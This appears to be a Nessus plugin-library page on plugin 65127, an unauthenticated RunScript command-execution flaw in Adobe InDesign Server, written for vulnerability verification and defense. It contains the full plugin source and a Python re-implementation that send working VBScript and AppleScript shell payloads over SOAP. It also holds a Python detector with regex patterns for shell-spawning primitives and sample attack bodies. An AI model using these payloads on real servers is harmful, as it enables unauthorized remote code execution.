Adobe InDesign Server RunScript Arbitrary Command Execution - Nessus

Severity: High | Plugin ID: 65127

This page contains detailed information about the Adobe InDesign Server RunScript Arbitrary Command Execution Nessus plugin, including the publicly available exploits and PoCs (on GitHub, in Metasploit and on Exploit-DB) that can be used to verify this vulnerability.

Plugin Overview


ID: 65127
Name: Adobe InDesign Server RunScript Arbitrary Command Execution
Filename: adobe_indesign_soap_runscript_rce.nasl
Vulnerability Published: 2012-11-16
This Plugin Published: 2013-03-08
Last Modification Time: 2021-01-19
Plugin Version: 1.5
Plugin Type: remote
Plugin Family: CGI abuses
Dependencies: os_fingerprint.nasl, wsdl.nasl
Excluded KB Items: Settings/disable_cgi_scanning

Vulnerability Information


Severity: High
Vulnerability Published: 2012-11-16
Patch Published: N/A
CVE: N/A
CPE: cpe:/a:adobe:indesign

Synopsis

A web service running on the remote host has a command execution vulnerability.

Description

The version of Adobe InDesign Server running on the remote host has an arbitrary command execution vulnerability. When the SOAP service is enabled, it processes requests for the RunScript method without requiring authentication. This method can be used to execute arbitrary VBScript on Windows, or AppleScript on Mac OS, and from either of those any shell command the service account is allowed to run. A remote, unauthenticated attacker could exploit this to execute arbitrary code.

Note that this plugin is an active check (script_category ACT_ATTACK, exploited_by_nessus true): rather than fingerprinting a version, it sends a RunScript request that executes `ipconfig` (Windows) or `/usr/bin/id` (Mac) on the target and reports the captured command output.

Solution

There is no known solution at this time.

Because the RunScript method performs no authentication of its own, the practical mitigation is at the network level: do not expose the InDesign Server SOAP port to untrusted networks, and restrict it to the hosts that legitimately submit jobs to the server.
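Because no patch is listed, the other compensating control besides network restriction is to watch for RunScript calls on the wire. The following is an added example in Python (not part of the Nessus plugin, the Metasploit module or Adobe's software) that takes the body of a POST to the SOAP endpoint, decides whether it is an IDSP:RunScript call, and flags scripts that spawn a shell using the primitives the plugin's own payloads and the public PoCs rely on (WScript.Shell and "cmd /c" on Windows, "do shell script" on Mac). The sample bodies are constructed here, not captured traffic; the "javascript" language name in the benign sample is an assumption; and the detection is best-effort pattern matching on the decoded script text, not an interpreter.

```python
import re
import xml.etree.ElementTree as ET
from typing import Optional

IDSP_NS = "http://ns.adobe.com/InDesign/soap/"

# Shell-spawning primitives used by the plugin's own payloads and the public
# PoCs: WScript.Shell / "cmd /c" on Windows, "do shell script" on Mac.
SHELL_PATTERNS = {
    "wscript_shell": re.compile(r'CreateObject\s*\(\s*"WScript\.Shell"\s*\)', re.I),
    "cmd_exec": re.compile(r"\bcmd(?:\.exe)?\s*/c\b", re.I),
    "applescript_shell": re.compile(r"\bdo shell script\b", re.I),
}


def classify_runscript(body: str) -> Optional[dict]:
    """Return None if the body is not an IDSP:RunScript call; otherwise the
    script language, the (XML-decoded) script text and the indicators hit."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    run = root.find(f".//{{{IDSP_NS}}}RunScript")
    if run is None:
        return None
    language = run.findtext(f".//{{{IDSP_NS}}}scriptLanguage", default="").strip().lower()
    # the parser already turned &amp; back into &, so the patterns see real code
    script = run.findtext(f".//{{{IDSP_NS}}}scriptText", default="")
    hits = [name for name, rx in SHELL_PATTERNS.items() if rx.search(script)]
    return {"language": language, "script": script,
            "indicators": hits, "suspicious": bool(hits)}


# --- constructed sample request bodies (not captured traffic) ----------------
def _envelope(language: str, script_xml: str) -> str:
    """Wrap an already XML-escaped script in the envelope the plugin sends."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" '
        'xmlns:IDSP="http://ns.adobe.com/InDesign/soap/"><SOAP-ENV:Body>'
        "<IDSP:RunScript><IDSP:runScriptParameters>"
        f"<IDSP:scriptLanguage>{language}</IDSP:scriptLanguage>"
        f"<IDSP:scriptText>{script_xml}</IDSP:scriptText>"
        "</IDSP:runScriptParameters></IDSP:RunScript>"
        "</SOAP-ENV:Body></SOAP-ENV:Envelope>"
    )


SAMPLES = {
    # the plugin's Windows payload as it appears on the wire (&amp; escaped)
    "windows_poc": _envelope("visual basic",
        'set shell = CreateObject("WScript.Shell")\n'
        'set process = shell.Exec("cmd /c ipconfig")\n'
        "do while not process.StdOut.AtEndOfStream\n"
        "    output = output &amp; process.StdOut.ReadLine() &amp; vbLf\n"
        "loop\nreturnValue = output"),
    # the plugin's Mac payload
    "mac_poc": _envelope("applescript", 'do shell script "/bin/sh -c /usr/bin/id"'),
    # benign automation; the "javascript" language name is an assumption here
    "benign": _envelope("javascript", "var doc = app.documents.add();"),
    # a non-RunScript body should be ignored entirely
    "not_runscript": '<?xml version="1.0"?><Envelope/>',
    # a truncated or garbled body must not crash the detector
    "garbage": "<IDSP:RunScript><unterminated",
}


def scan_samples() -> dict:
    """Classify every constructed sample; used as the offline demonstration."""
    return {name: classify_runscript(body) for name, body in SAMPLES.items()}


if __name__ == "__main__":
    for name, result in scan_samples().items():
        print(f"{name:14s} -> {result and result['indicators']}")
```

The same logic can be fed from a reverse proxy or a web server's request-body log in front of the SOAP port; any hit on a Windows or Mac shell primitive from an address that is not a known job submitter is worth an alert, and a RunScript call from outside the allowed host list is worth one even without a pattern hit.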

Public Exploits


Target Network Port(s): N/A
Target Asset(s): wsdl/adobe_indesign
Exploit Available: True (Metasploit Framework, Exploit-DB)
Exploit Ease: Exploits are available

Here's the list of publicly known exploits and PoCs for verifying the Adobe InDesign Server RunScript Arbitrary Command Execution vulnerability:

  1. Metasploit: exploit/multi/misc/indesign_server_soap
    [Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution]
  2. Exploit-DB: exploits/multiple/remote/23178.rb
    [EDB-23178: Adobe IndesignServer 5.5 - SOAP Server Arbitrary Script Execution (Metasploit)]

Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. In any other case, this would be considered illegal activity.

WARNING: Beware of using unverified exploits from sources such as GitHub or Exploit-DB; these exploits and PoCs could contain malware. Review the code before running it, and run it only from an isolated host.

Risk Information


CVSS V2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P/E:F/RL:U/RC:ND
CVSS Base Score: 7.5 (High)
Impact Subscore: 6.4
Exploitability Subscore: 10.0
CVSS Temporal Score: 7.1 (High)
CVSS Environmental Score: NA (None)
Modified Impact Subscore: NA
Overall CVSS Score: 7.1 (High)


Plugin Source


This is the adobe_indesign_soap_runscript_rce.nasl nessus plugin source code. This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(65127);
  script_version("1.5");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");

  script_bugtraq_id(56574);
  script_xref(name:"EDB-ID", value:"23178");
  script_xref(name:"Secunia", value:"48572");

  script_name(english:"Adobe InDesign Server RunScript Arbitrary Command Execution");
  script_summary(english:"Tries to execute a command");

  script_set_attribute(
    attribute:"synopsis",
    value:
"A web service running on the remote host has a command execution
vulnerability."
  );
  script_set_attribute(
    attribute:"description",
    value:
"The version of Adobe InDesign Server running on the remote host has an
arbitrary command execution vulnerability.  When the SOAP service is
enabled, it processes requests for the RunScript method without
requiring authentication.  This method can be used to execute arbitrary
VBScript on Windows, or AppleScript on Mac OS.  A remote,
unauthenticated attacker could exploit this to execute arbitrary code."
  );
  script_set_attribute(attribute:"solution", value:"There is no known solution at this time.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:U/RC:ND");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2012/11/16");
  script_set_attribute(attribute:"plugin_publication_date", value:"2013/03/08");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:adobe:indesign");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("wsdl.nasl", "os_fingerprint.nasl");
  script_require_ports("wsdl/adobe_indesign");
  script_exclude_keys("Settings/disable_cgi_scanning");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
# needed for data_protection::sanitize_uid() used in _report_and_exit()
include("data_protection.inc");

global_var port;
port = get_kb_item_or_exit('wsdl/adobe_indesign');

##
# Sends a RunScript request to the InDesign SOAP Server
#
# @anonparam language the language of the script contained in the RunScript request
# @anonparam script the source code of the script to execute
# @return the resulting RunScriptResponse (an XML string)
##
function _run_script()
{
  local_var language, code, req, res;
  language = _FCT_ANON_ARGS[0];
  code = _FCT_ANON_ARGS[1];

  req =
'<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:IDSP="http://ns.adobe.com/InDesign/soap/">
  <SOAP-ENV:Body>
    <IDSP:RunScript>
      <IDSP:runScriptParameters>
        <IDSP:scriptLanguage>' + language + '</IDSP:scriptLanguage>
        <IDSP:scriptText>' + code + '</IDSP:scriptText>
      </IDSP:runScriptParameters>
    </IDSP:RunScript>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>';

  res = http_send_recv3(
    method:'POST',
    item:'/',
    content_type:'text/xml',
    port:port,
    data:req,
    exit_on_fail:TRUE
  );

  return res[2];
}

##
# Attempts to execute a shell command on a Mac host using AppleScript via a RunScript request
#
# @remark the output that the server sends in its response is the value of the last variable in the script
# @anonparam cmd command to execute
# @return a RunScriptResponse
##
function _run_mac_cmd()
{
  local_var cmd, code;
  cmd = _FCT_ANON_ARGS[0];

  code = 'do shell script "/bin/sh -c ' + cmd + '"';

  return _run_script('applescript', code);
}

##
# Attempts to execute a shell command on a Windows host using VBScript via a RunScript request
#
# @remark the output that the server sends in the response is whatever is
#         assigned to the "returnValue" variable in the script
# @anonparam cmd command to execute. this command is passed directly to "cmd /c"
# @return a RunScriptResponse
##
function _run_windows_cmd()
{
  local_var cmd, code;
  cmd = _FCT_ANON_ARGS[0];

  code =
'set shell = CreateObject("WScript.Shell")
set process = shell.Exec("cmd /c ' + cmd + '")
do while not process.StdOut.AtEndOfStream
    output = output &amp; process.StdOut.ReadLine() &amp; vbLf
loop
returnValue = output';

  return _run_script('visual basic', code);
}

##
# Tries to parse command output from a RunScriptResponse
#
# @anonparam xml SOAP response containing the RunScriptResponse to parse
# @return command output if any was found in 'xml',
#         NULL otherwise
##
function _parse_output()
{
  local_var xml, start_tag, end_tag, output;
  xml = _FCT_ANON_ARGS[0];

  start_tag = stridx(xml, '<scriptResult><data xsi:type="xsd:string">');
  if (start_tag == -1) return NULL;

  end_tag = stridx(xml, '</data>', start_tag + 1);
  if (end_tag == -1) return NULL;

  output = substr(xml, start_tag, end_tag - 1);
  output -= '<scriptResult><data xsi:type="xsd:string">';
  output = str_replace(string:output, find:'&#xA;', replace:'\n');
  return output;
}

##
# Reports the vulnerability and exits
#
# @anonparam cmd shell command that was executed
# @anonparam output command output from running "cmd"
# @remark this function exits before returning
##
function _report_and_exit()
{
  local_var cmd, output, report;
  cmd = _FCT_ANON_ARGS[0];
  output = _FCT_ANON_ARGS[1];

  # strip user identifiers from the captured output before it goes in a report
  output = data_protection::sanitize_uid(output:output);

  if (report_verbosity > 0)
  {
    report =
      '\nNessus executed "' + cmd + '" by sending the following request :\n\n' +
      crap(data:'-', length:30) + " request " + crap(data:'-', length:30) + '\n' +
      chomp(http_last_sent_request()) + '\n' +
      crap(data:'-', length:30) + " request " + crap(data:'-', length:30) + '\n' +
      '\nWhich resulted in the following command output :\n\n' +
      output;
    security_hole(port:port, extra:report);
  }
  else security_hole(port);

  exit(0);
}

# the software only runs on Windows or Mac. We can use the OS fingerprinting
# results as a best guess for which payload to attempt first, but if ends up
# being inaccurate, both payloads will be attempted
os = get_kb_item('Host/OS');
if (isnull(os) || 'Windows' >< os)
  do_windows_poc = TRUE;
else
  do_windows_poc = FALSE;

for (i = 0; i < 2; i++)
{
  if (do_windows_poc)
  {
    cmd = 'ipconfig';
    xml = _run_windows_cmd(cmd);
    output = _parse_output(xml);
    if ('Windows IP Configuration' >< output)
      _report_and_exit(cmd, output);
  }
  else
  {
    cmd = '/usr/bin/id';
    xml = _run_mac_cmd(cmd);
    output = _parse_output(xml);
    if ('uid=' >< output)
      _report_and_exit(cmd, output);
  }

  # 'visual basic' is only valid on Windows, and 'applescript' is only valid
  # on Mac. If the server responds to say the language specified in the request
  # is invalid, that means the plugin used the wrong PoC, and it will try again
  # (at most, two PoCs will be attempted).  if the server doesn't say the language
  # specified was invalid, that means something unexpected happened, which means
  # the bug is probably not exploitable against the target
  if ('Invalid scripting language' >< xml)
    do_windows_poc = do_windows_poc ^ TRUE;
  else
    audit(AUDIT_LISTEN_NOT_VULN, 'InDesign Server SOAP service', port);
}

# i don't think this code is reachable, but it's here just in case
audit(AUDIT_LISTEN_NOT_VULN, 'InDesign Server SOAP service', port);
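The plugin's decision loop above, re-implemented in Python as an added example (not Tenable's code and not the Metasploit module) with the HTTP transport injected so it can be run offline. build_runscript_request uses ElementTree, so the script text is XML-escaped automatically (the NASL version writes `&amp;` by hand because it concatenates raw XML); parse_script_result pulls the scriptResult/data text out of the response, with the parser decoding the `&#xA;` newlines the plugin replaces itself; and check_target guesses the OS from a hint, tries at most two payloads, and stops on any reply other than "Invalid scripting language", exactly as the plugin does. The server responses are constructed from the strings the plugin matches on and are not captured from a real InDesign Server; a live run would pass a `send` function that POSTs the bytes to `/` on the SOAP port with Content-Type text/xml and returns the response body.

```python
import xml.etree.ElementTree as ET
from typing import Callable, Optional

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
IDSP_NS = "http://ns.adobe.com/InDesign/soap/"
ET.register_namespace("SOAP-ENV", SOAP_NS)
ET.register_namespace("IDSP", IDSP_NS)


def build_runscript_request(language: str, script: str) -> bytes:
    """Build the IDSP:RunScript envelope the plugin sends. ElementTree escapes
    '&', '<' and '>' inside the script text for us."""
    env = ET.Element(f"{{{SOAP_NS}}}Envelope")
    body = ET.SubElement(env, f"{{{SOAP_NS}}}Body")
    run = ET.SubElement(body, f"{{{IDSP_NS}}}RunScript")
    params = ET.SubElement(run, f"{{{IDSP_NS}}}runScriptParameters")
    ET.SubElement(params, f"{{{IDSP_NS}}}scriptLanguage").text = language
    ET.SubElement(params, f"{{{IDSP_NS}}}scriptText").text = script
    return ET.tostring(env, encoding="utf-8", xml_declaration=True)


def windows_cmd_request(cmd: str) -> bytes:
    """Same VBScript as the plugin: run "cmd /c <cmd>" and hand back its stdout
    through the returnValue variable."""
    script = (
        'set shell = CreateObject("WScript.Shell")\n'
        f'set process = shell.Exec("cmd /c {cmd}")\n'
        "do while not process.StdOut.AtEndOfStream\n"
        "    output = output & process.StdOut.ReadLine() & vbLf\n"
        "loop\n"
        "returnValue = output")
    return build_runscript_request("visual basic", script)


def mac_cmd_request(cmd: str) -> bytes:
    """Same AppleScript as the plugin: the last expression's value is returned."""
    return build_runscript_request("applescript", f'do shell script "/bin/sh -c {cmd}"')


def _local(tag: str) -> str:
    return tag.rsplit("}", 1)[-1]


def parse_script_result(xml: str) -> Optional[str]:
    """Return the text of <scriptResult><data> or None if it is absent."""
    try:
        root = ET.fromstring(xml)
    except ET.ParseError:
        return None
    for el in root.iter():
        if _local(el.tag) == "scriptResult":
            for child in el:
                if _local(child.tag) == "data":
                    return child.text or ""
    return None


def check_target(send: Callable[[bytes], str], os_hint: Optional[str]) -> Optional[dict]:
    """Mirror the plugin: guess the OS, try at most two payloads, and treat any
    reply other than 'Invalid scripting language' as final."""
    do_windows = os_hint is None or "Windows" in os_hint
    for _ in range(2):
        if do_windows:
            cmd, req, marker = "ipconfig", windows_cmd_request("ipconfig"), "Windows IP Configuration"
        else:
            cmd, req, marker = "/usr/bin/id", mac_cmd_request("/usr/bin/id"), "uid="
        xml = send(req)
        output = parse_script_result(xml)
        if output is not None and marker in output:
            return {"command": cmd, "output": output}
        if "Invalid scripting language" in xml:
            do_windows = not do_windows   # wrong OS guess; swap payloads
        else:
            return None                   # anything else: not exploitable
    return None


# --- constructed responses for an offline run (shape assumed from the strings
# --- the plugin matches on, not captured from a real server) -----------------
def _response(inner: str) -> str:
    return ('<?xml version="1.0" encoding="UTF-8"?>'
            '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" '
            'xmlns:IDSP="http://ns.adobe.com/InDesign/soap/" '
            'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Body>'
            f"<IDSP:RunScriptResponse>{inner}</IDSP:RunScriptResponse>"
            "</SOAP-ENV:Body></SOAP-ENV:Envelope>")


INVALID_LANGUAGE = _response("<errorNumber>1</errorNumber>"
                             "<errorString>Invalid scripting language</errorString>")
WINDOWS_OK = _response('<errorNumber>0</errorNumber><scriptResult><data xsi:type="xsd:string">'
                       "Windows IP Configuration&#xA;&#xA;Ethernet adapter Local Area Connection:"
                       "</data></scriptResult>")
MAC_OK = _response('<errorNumber>0</errorNumber><scriptResult><data xsi:type="xsd:string">'
                   "uid=501(indesign) gid=20(staff)</data></scriptResult>")


def fake_server(target_os: str) -> Callable[[bytes], str]:
    """Simulate a vulnerable server that only accepts its own OS's language."""
    def send(req: bytes) -> str:
        lang = ET.fromstring(req).findtext(f".//{{{IDSP_NS}}}scriptLanguage")
        if (target_os, lang) == ("Windows", "visual basic"):
            return WINDOWS_OK
        if (target_os, lang) == ("Mac", "applescript"):
            return MAC_OK
        return INVALID_LANGUAGE
    return send


if __name__ == "__main__":
    # wrong hint on purpose: the Windows payload is rejected, the Mac one lands
    print(check_target(fake_server("Mac"), "Microsoft Windows Server 2008"))
```

Note what the loop does not do: it never retries on a transport error or an unexpected SOAP fault, because the plugin treats anything other than the explicit language rejection as "not vulnerable". If you wire in a real transport, keep that behaviour; a timeout should be reported as inconclusive, not as a second attempt with the other payload.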

The latest version of this script can be found in these locations depending on your platform:

  • Linux / Unix:
    /opt/nessus/lib/nessus/plugins/adobe_indesign_soap_runscript_rce.nasl
  • Windows:
    C:\ProgramData\Tenable\Nessus\nessus\plugins\adobe_indesign_soap_runscript_rce.nasl
  • Mac OS X:
    /Library/Nessus/run/lib/nessus/plugins/adobe_indesign_soap_runscript_rce.nasl


How to Run


Here is how to run the Adobe InDesign Server RunScript Arbitrary Command Execution plugin on its own via the Nessus web user interface (https://localhost:8834/). Because this is an active check (ACT_ATTACK), a successful run executes `ipconfig` or `/usr/bin/id` on the target through the SOAP service, so only point it at systems you are authorized to test:

  1. Click to start a New Scan.
  2. Select Advanced Scan.
  3. Navigate to the Plugins tab.
  4. On the top right corner click to Disable All plugins.
  5. On the left side table select CGI abuses plugin family.
  6. On the right side table select Adobe InDesign Server RunScript Arbitrary Command Execution plugin ID 65127.
  7. Specify the target on the Settings tab and click to Save the scan.
  8. Run the scan.

Here are a few examples of how to run the plugin in the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.

Basic usage:

/opt/nessus/bin/nasl adobe_indesign_soap_runscript_rce.nasl -t <IP/HOST>

Run the plugin with audit trail message on the console:

/opt/nessus/bin/nasl -a adobe_indesign_soap_runscript_rce.nasl -t <IP/HOST>

Run the plugin with trace script execution written to the console (useful for debugging):

/opt/nessus/bin/nasl -T - adobe_indesign_soap_runscript_rce.nasl -t <IP/HOST>

Run the plugin with using a state file for the target and updating it (useful for running multiple plugins on the target):

/opt/nessus/bin/nasl -K /tmp/state adobe_indesign_soap_runscript_rce.nasl -t <IP/HOST>


References


BID | SecurityFocus Bugtraq ID: 56574
Secunia Advisory: 48572
Exploit-DB: EDB-ID 23178

See also: Similar and related Nessus plugins:
  • 44937 - Multiple Adobe Products XML External Entity (XXE) Injection (APSB10-05)
  • 99731 - Adobe ColdFusion BlazeDS Java Object Deserialization RCE
  • 66404 - Adobe ColdFusion Multiple Vulnerabilities (APSA13-03)
  • 64689 - Adobe ColdFusion Authentication Bypass (APSB13-03)
  • 66408 - Adobe ColdFusion Authentication Bypass (APSB13-13) (intrusive check)
  • 130263 - Adobe ColdFusion File Upload (APSB18-33) (CVE-2018-15961)
  • 39790 - Adobe ColdFusion FCKeditor 'CurrentFolder' File Upload
  • 48340 - Adobe ColdFusion 'locale' Parameter Directory Traversal
  • 41947 - Adobe RoboHelp Server Security Bypass (APSA09-05 / intrusive check)
  • 41946 - Adobe RoboHelp Server Security Bypass (APSA09-05)

Version


This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file adobe_indesign_soap_runscript_rce.nasl version 1.5. For more plugins, visit the Nessus Plugin Library.
